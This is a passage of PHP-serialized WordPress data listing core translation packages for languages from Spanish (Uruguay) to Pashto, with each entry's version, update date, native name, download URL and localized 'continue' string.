Uruguay\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_UY.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PR\";a:8:{s:8:\"language\";s:5:\"es_PR\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-04-29 15:36:59\";s:12:\"english_name\";s:21:\"Spanish (Puerto Rico)\";s:11:\"native_name\";s:23:\"Español de Puerto Rico\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.12/es_PR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:6:\"5.2.17\";s:7:\"updated\";s:19:\"2019-03-02 06:35:01\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.2.17/es_GT.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-17 14:28:26\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_AR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-16 13:13:32\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/es_VE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-08-12 08:38:59\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-15 05:47:03\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_AF\";a:8:{s:8:\"language\";s:5:\"fa_AF\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-19 05:14:04\";s:12:\"english_name\";s:21:\"Persian (Afghanistan)\";s:11:\"native_name\";s:31:\"(فارسی (افغانستان\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/fa_AF.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-17 08:19:07\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-07 05:25:25\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-12 18:38:54\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-23 13:11:21\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-22 13:54:46\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:3:\"fur\";a:8:{s:8:\"language\";s:3:\"fur\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2018-01-29 17:32:35\";s:12:\"english_name\";s:8:\"Friulian\";s:11:\"native_name\";s:8:\"Friulian\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.21/fur.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"fur\";i:3;s:3:\"fur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"fy\";a:8:{s:8:\"language\";s:2:\"fy\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-25 12:53:23\";s:12:\"english_name\";s:7:\"Frisian\";s:11:\"native_name\";s:5:\"Frysk\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/fy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fy\";i:2;s:3:\"fry\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Trochgean\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-03 10:28:43\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2018-09-14 12:33:48\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.9.22/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:31:\"ચાલુ રાખવું\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:6:\"4.4.29\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.4.29/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-02 09:16:06\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-11-06 12:34:38\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.12/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"जारी रखें\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-15 19:56:23\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:3:\"hsb\";a:8:{s:8:\"language\";s:3:\"hsb\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-07-18 19:40:10\";s:12:\"english_name\";s:13:\"Upper Sorbian\";s:11:\"native_name\";s:17:\"Hornjoserbšćina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1.1/hsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"hsb\";i:3;s:3:\"hsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:4:\"Dale\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-23 17:09:07\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-29 15:17:58\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2018-12-11 10:40:02\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.22/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-30 17:30:13\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-06 07:11:58\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"次へ\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2019-02-16 23:58:56\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.22/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-10-24 08:01:09\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-21 21:13:06\";s:12:\"english_name\";s:6:\"Kabyle\";s:11:\"native_name\";s:9:\"Taqbaylit\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1.1/kab.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"kab\";i:3;s:3:\"kab\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Kemmel\";}}s:2:\"kk\";a:8:{s:8:\"language\";s:2:\"kk\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2018-07-10 11:35:44\";s:12:\"english_name\";s:6:\"Kazakh\";s:11:\"native_name\";s:19:\"Қазақ тілі\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.9.22/kk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kk\";i:2;s:3:\"kaz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Жалғастыру\";}}s:2:\"km\";a:8:{s:8:\"language\";s:2:\"km\";s:7:\"version\";s:6:\"5.2.17\";s:7:\"updated\";s:19:\"2019-06-10 16:18:28\";s:12:\"english_name\";s:5:\"Khmer\";s:11:\"native_name\";s:27:\"ភាសាខ្មែរ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.2.17/km.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"km\";i:2;s:3:\"khm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"បន្ត\";}}s:2:\"kn\";a:8:{s:8:\"language\";s:2:\"kn\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-10-20 17:15:28\";s:12:\"english_name\";s:7:\"Kannada\";s:11:\"native_name\";s:15:\"ಕನ್ನಡ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/kn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"kn\";i:2;s:3:\"kan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"ಮುಂದುವರಿಸು\";}}s:5:\"ko_KR\";a:8:{s:8:\"language\";s:5:\"ko_KR\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-21 23:01:12\";s:12:\"english_name\";s:6:\"Korean\";s:11:\"native_name\";s:9:\"한국어\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/ko_KR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ko\";i:2;s:3:\"kor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"계속\";}}s:3:\"ckb\";a:8:{s:8:\"language\";s:3:\"ckb\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-12-07 16:32:30\";s:12:\"english_name\";s:16:\"Kurdish (Sorani)\";s:11:\"native_name\";s:13:\"كوردی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.8.6/ckb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ku\";i:3;s:3:\"ckb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"بهردهوام به\";}}s:2:\"lo\";a:8:{s:8:\"language\";s:2:\"lo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 09:59:23\";s:12:\"english_name\";s:3:\"Lao\";s:11:\"native_name\";s:21:\"ພາສາລາວ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/lo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lo\";i:2;s:3:\"lao\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"ຕໍ່ໄປ\";}}s:5:\"lt_LT\";a:8:{s:8:\"language\";s:5:\"lt_LT\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-24 03:51:58\";s:12:\"english_name\";s:10:\"Lithuanian\";s:11:\"native_name\";s:15:\"Lietuvių kalba\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/lt_LT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lt\";i:2;s:3:\"lit\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Tęsti\";}}s:2:\"lv\";a:8:{s:8:\"language\";s:2:\"lv\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-06 16:38:45\";s:12:\"english_name\";s:7:\"Latvian\";s:11:\"native_name\";s:16:\"Latviešu valoda\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/lv.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"lv\";i:2;s:3:\"lav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Turpināt\";}}s:5:\"mk_MK\";a:8:{s:8:\"language\";s:5:\"mk_MK\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-10-01 09:23:52\";s:12:\"english_name\";s:10:\"Macedonian\";s:11:\"native_name\";s:31:\"Македонски јазик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/mk_MK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mk\";i:2;s:3:\"mkd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Продолжи\";}}s:5:\"ml_IN\";a:8:{s:8:\"language\";s:5:\"ml_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:43:32\";s:12:\"english_name\";s:9:\"Malayalam\";s:11:\"native_name\";s:18:\"മലയാളം\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ml_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ml\";i:2;s:3:\"mal\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"തുടരുക\";}}s:2:\"mn\";a:8:{s:8:\"language\";s:2:\"mn\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-02 15:24:05\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.1.1/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2019-11-22 15:32:08\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.9.22/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:6:\"5.5.11\";s:7:\"updated\";s:19:\"2022-03-11 13:52:22\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.5.11/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:6:\"4.2.34\";s:7:\"updated\";s:19:\"2017-12-26 11:57:10\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.34/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-11-11 01:42:08\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-24 12:00:31\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2022-12-05 12:28:58\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.1.1/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-26 10:11:03\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-31 09:04:37\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-18 10:59:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2017-08-25 10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.21/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:15:\"Panjabi (India)\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"6.1.1\";s:7:\"updated\";s:19:\"2023-01-30 18:34:57\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.1.1/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.3.30\";s:7:\"updated\";s:19:\"2015-12-02 